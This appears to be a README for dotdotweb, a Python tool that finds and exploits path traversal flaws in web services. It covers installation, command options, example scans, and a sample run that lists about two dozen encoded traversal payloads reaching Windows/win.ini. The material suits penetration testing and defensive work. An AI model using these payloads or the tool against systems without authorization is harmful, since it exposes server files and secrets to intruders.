Utility for detection & exploitation of Path Traversal vulnerabilities in various network services
dotdotweb - PT tool for HTTP services
Tools are written in Python with using asyncio requests (aiohttp) with some acceleration techniques, which allows you to make up to ~3K requests per second
- using asynchronous requests for increasing scan of target
- ability to fetch files' content after succeeding a payload
- specifying payload in any part of query (URL, headers or POST data)
- using callbacks for handling of results
Install from PyPi
pip install dotdotfarmYou can also install it directly from GitHub repository
git clone https://github.com/treddis/dotdotfarm.git
cd dotdotfarm
pip3 install .To upgrade tool run
pip install --upgrade dotdotfarm
.___ __ .___ __ _____
__| _/_____/ |_ __| _/_____/ |__/ ____\____ _______ _____
/ __ |/ _ \ __\/ __ |/ _ \ __\ __\\__ \\_ __ \/ \
/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \| | \/ Y Y \
\____ |\____/|__| \____ |\____/|__| |__| (____ /__| |__|_| /
\/ \/ \/ \/
usage: dotdotweb [-h] [--version] [-V] [-A] [-R] [-o {windows,linux}]
[-d DEPTH] [-f FILE] [--delay DELAY]
[-t TIMEOUT] [-fs FS] [-fc FC] [--header HEADERS] [--data DATA]
url
fast path traversal identificator & exploit
positional arguments:
url target URL
options:
-h, --help show this help message and exit
--version print version of the tool
-V, --validate validate files' content after successfull exploitation
(default false)
-A, --all try all files after successfull exploitation
(default false)
-R, --print-files read traversed files (default false)
-o {windows,linux}, --os-type {windows,linux}
target OS type (default all)
-d DEPTH, --depth DEPTH
depth of PT searching (default 5)
-f FILE, --file FILE specific file for PT detection
--delay DELAY make delays between requests in milliseconds (default 0)
-t TIMEOUT, --timeout TIMEOUT
timeout of connections (default 60)
-fs FS filter output by size
-fc FC filter output by response code
--header HEADERS custom header for requests
--data DATA specify POST data
Passing brute parameters via ?par=val pairs:
dotdotweb -o windows -fc 500 \
http://someserver.com:1280/newpath?testparameter=FUZZ&secondparameter=somevalue
Passing brute parameters via Origin: master=FUZZ pairs:
dotdotweb -o linux -fc 500,404 -H "Referer: https://www.google.com/path?q=FUZZ" \
http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue
Passing brute parameters via POST data parameters
dotdotweb -o linux -fc 500 -fs 111 -d "key0=val0&key1=val1" \
http://someserver.com:1280/newpath?testparameter=firstvalue&secondparameter=somevalue
Pass -fs (filter by size) or -fc (filter by status code) to filter out not related responses
dotdotweb -fc 50*,4* -fs 18??,1834* http://someserver.com:1234/testpath/FUZZ
You can launch callbacks on your responses to perform some check or make other actions. In the box implemented callbacks:
- validate response content using regexp and print then (-V). You can pass your regexp too!
- try all payloads even entry point is found (-A)
- read traversed files content and print them on screen (-P)
dotdotweb -o windows "http://localhost:8080/pathtrav?query=FUZZ"
.___ __ .___ __ _____
__| _/_____/ |_ __| _/_____/ |__/ ____\____ _______ _____
/ __ |/ _ \ __\/ __ |/ _ \ __\ __\\__ \\_ __ \/ \
/ /_/ ( <_> ) | / /_/ ( <_> ) | | | / __ \| | \/ Y Y \
\____ |\____/|__| \____ |\____/|__| |__| (____ /__| |__|_| /
\/ \/ \/ \/
[*] Started at Sun Jan 22 19:32:46 2023
../../../Windows/win.ini [Status: 200, Size: 111]
../Windows/win.ini [Status: 200, Size: 111]
..\Windows\win.ini [Status: 200, Size: 111]
..%2fWindows%2fwin.ini [Status: 200, Size: 111]
..\..\..\Windows\win.ini [Status: 200, Size: 111]
..%5c..%5c..%5cWindows%5cwin.ini [Status: 200, Size: 111]
..%5cWindows%5cwin.ini [Status: 200, Size: 111]
.%2e/Windows/win.ini [Status: 200, Size: 111]
.%2e\Windows\win.ini [Status: 200, Size: 111]
.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]
.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]
%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]
f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]
%5C../Windows/win.ini [Status: 200, Size: 111]
%5C..\%5C..\%5C..\Windows\win.ini [Status: 200, Size: 111]
.%2e\.%2e\.%2e\Windows\win.ini [Status: 200, Size: 111]
.%2e%5c.%2e%5c.%2e%5cWindows%5cwin.ini [Status: 200, Size: 111]
%5C..%2f%5C..%2f%5C..%2fWindows%2fwin.ini [Status: 200, Size: 111]
%5C../%5C../%5C../Windows/win.ini [Status: 200, Size: 111]
%5C..%5c%5C..%5c%5C..%5cWindows%5cwin.ini [Status: 200, Size: 111]
%2e./Windows/win.ini [Status: 200, Size: 111]
%2e./%2e./%2e./Windows/win.ini [Status: 200, Size: 111]
%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]
%2e.%5c%2e.%5c%2e.%5cWindows%5cwin.ini [Status: 200, Size: 111]
.%2e%2f.%2e%2f.%2e%2fWindows%2fwin.ini [Status: 200, Size: 111]
100%|██████████████████████████████████████████████████████████| 6960/6960 [00:12<00:00, 575.63it/s]
[*] Ended at Sun Jan 22 19:32:58 2023 (11 seconds)
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent